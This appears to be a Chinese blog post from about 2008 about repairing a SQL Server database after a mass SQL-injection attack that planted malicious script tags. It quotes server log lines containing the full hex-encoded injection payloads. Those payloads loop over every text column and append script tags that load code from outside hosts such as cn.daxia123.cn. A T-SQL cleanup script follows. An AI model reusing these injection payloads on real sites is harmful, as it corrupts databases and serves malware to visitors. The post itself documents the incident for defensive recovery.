`
Gboshi
  • 浏览: 15311 次
  • 性别: Icon_minigender_1
  • 来自: 西安
社区版块
存档分类
最新评论

XSS病毒攻击后的数据修复

阅读更多

近期客户网站遭遇JS木马病毒攻击,一般攻击的是SQL SERVER 2000数据库。

其源码如下:

攻击:第一次的时候什么大侠123来着忘记了,这次呢又是这个!~~~

<script src=http://3bom%62%2Ecom/c.js></script>

 

呵呵 看来并非SQL POST         或者  GET 注入了 ,因为我已经将SQL一般注入防止了。

我们看看网站日志:

2008年12月28日    ex081228.log 数据日志:

异常信息:

activity_view.asp key=3%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%3 -

异常信息:

/news_view.asp key=132|41|80040e07|将_varchar_值

activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -

以上信息自己分析吧  ,这里不多讲了

下面处理数据库的SQL程序:

declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc  
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
    open tb
        fetch next from tb into &tbName,&colName
        while &&fetch_status=0
            begin
                set &str='<script src=http://3bom%62%2Ecom/c.js>'
                set &dd =''''''
                set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where  '
                set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
                --print &sql
                exec(&sql)
                fetch next from tb into &tbName,&colName
            end
    close tb
deallocate tb  

  

分享到:
评论

相关推荐

    XSS蠕虫&病毒--即将发生的威胁与最好的防御

    5. **加强监测与响应**:建立有效的监测系统,一旦发现XSS攻击迹象,立即采取行动隔离并修复受影响的部分。 通过综合运用这些策略,企业和组织可以有效减少XSS蠕虫与病毒带来的威胁,保护用户的信息安全。 #### ...

    XSS利用文档

    1. 防御策略:防御XSS攻击的关键在于对用户输入进行严格的验证和过滤,确保所有用户提交的数据都被正确转义。此外,使用HTTP-only cookies可以防止会话cookie被JavaScript访问,从而降低攻击风险。内容安全策略...

    xss源码,并且整体风格编辑过

    DOM型XSS则涉及客户端JavaScript的DOM(文档对象模型),攻击者通过修改DOM树中的数据,导致页面上的JavaScript执行恶意代码。 XSS攻击可以做的事情非常多,几乎涵盖JavaScript能实现的所有功能: 1. **会话劫持**...

    xss_talk:我的XSS演讲的幻灯片和演示应用程序

    - 用户数据泄露:攻击者可以通过XSS获取用户的登录凭据、个人数据等。 - 钓鱼攻击:伪造页面,诱导用户执行操作,如点击恶意链接或提交个人信息。 - 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 ...

    基于数据挖掘技术的计算机网络病毒防御技术.pdf

    随着计算机技术的飞速发展,信息安全问题日益凸显,尤其是计算机...同时,为了防止网络攻击和病毒入侵,还需采取必要的技术措施,包括但不限于漏洞修复、入侵检测系统部署和安全策略制定等,以保护信息系统免受攻击。

    跨站脚本攻击实例解析

    跨站脚本攻击(Cross-Site Scripting,简称XSS)是网络安全领域中常见的攻击手段之一,它利用了Web应用程序的不足,使攻击者能够注入恶意脚本到网页上,进而影响用户的安全。这种攻击方式可能导致用户数据泄露、会话...

    cross_site_scripting.pdf

    这种攻击利用了信任关系,即用户对合法网站的信任,使得攻击者能够通过受害者的浏览器执行任意代码,从而盗取敏感数据、篡改网页或传播病毒等。 ### 二、XSS攻击的类型 XSS攻击主要分为三种类型: 1. **存储型XSS...

    电信设备-跨站攻击解决方法、移动终端及存储介质.zip

    在IT行业中,安全是至关重要的一个领域,尤其是对于电信设备来说,它们承载着大量的通信数据,因此必须具备抵御各种攻击的能力。"电信设备-跨站攻击解决方法、移动终端及存储介质.zip"这个压缩包文件显然关注的是...

    脚本入侵专题(包括国内国外的一些文档)

    脚本入侵,也称为跨站脚本攻击(Cross-Site Scripting,简称XSS),是指攻击者在Web页面中注入恶意脚本,当用户浏览这些页面时,恶意脚本会在用户的浏览器中执行,从而盗取用户敏感信息或破坏网站功能。这种攻击方式...

    2022年网络信息系统安全应急预案范文.doc

    这包括Web应用程序的安全,如SQL注入、跨站脚本(XSS)攻击,以及软件的授权和访问控制。未验证的用户输入、不安全的默认设置、不恰当的数据加密都可能导致数据泄露或系统被操纵。 4. 应急组织机构和职责 应急组织...

    「数据安全」国家网络空间威胁情报大数据共享开放平台建设的思考 - 安全研究.zip

    平台需要防范常见的Web攻击,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)。应用防火墙(WAF)和安全编码实践对于防止这些攻击至关重要。 3. **安全防御**:安全防御体系包括预防、检测和响应机制。预防措施...

    信息安全_数据安全_认证体制研究.pdf

    安全威胁无处不在,从传统的病毒和木马到现代的勒索软件和零日攻击,都对网络安全构成严重挑战。因此,安全对抗策略必须不断演进。这包括强化网络安全防护、实施安全培训、采用先进的安全技术和制定完善的安全政策。...

    HackReal.4:由_PC_端安全问题引发的重重隐患.pdf

    6. **蠕虫攻击**:通过邮件传播的蠕虫病毒可以自我复制并执行各种恶意行为,如发送更多邮件、查看用户的好友列表等,这在Wooyun的报告中也有提及。 7. **PC端与移动端的安全**:不仅PC端的邮箱服务存在安全隐患,...

    「安全众测」专业逆向人才培养模式探讨与实践 - 数据安全.zip

    1. Web应用安全:Web安全主要关注SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等常见攻击手法,逆向工程师需要掌握Web渗透测试技巧,发现并修复这些漏洞。 2. OWASP(Open Web Application Security Project)...

    返利网 PHP (无病毒版)

    在部署和运行此类源码时,仍需注意定期更新、修复漏洞,防止SQL注入、XSS跨站脚本攻击等常见Web安全问题。 5. **网站功能**:一个典型的返利网可能包括以下功能: - 用户注册/登录系统:允许用户创建账户、管理...

    安全性方面的英文翻译

    - 跨站脚本(XSS)攻击:在网页中注入可执行的脚本,以盗取用户数据或操纵用户浏览器。 为了防范这些安全威胁,我们需要实施多层次的安全策略,包括防火墙、入侵检测系统、数据加密、身份验证、访问控制、安全更新...

    WebSecurityGuard

    WebSecurityGuard是一款专注于Web安全检测与监控的工具,它旨在帮助企业及个人用户保护其网站免受各种网络威胁,如SQL注入、跨站脚本攻击(XSS)、钓鱼攻击、恶意软件感染等。这款工具通过实时监测、深度扫描和智能...

    实验十一-网站程序与网站安全.pdf

    3. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器中执行恶意脚本,可能导致数据泄露、会话劫持等。防止XSS攻击的方法包括正确地编码输出、使用HTTPOnly Cookie防止会话令牌被盗,以及利用Content Security ...

    「系统安全」正义黎明:关于网络空间安全竞赛与人才的若干思考 - 渗透测试.zip

    它是一种模拟攻击者行为,对系统、网络或应用程序进行的授权测试,目的是发现并修复潜在的安全漏洞。渗透测试包括了多种技术,如网络扫描、漏洞利用、社会工程学等,旨在评估组织的安全防御能力。了解和掌握这些技术...

Global site tag (gtag.js) - Google Analytics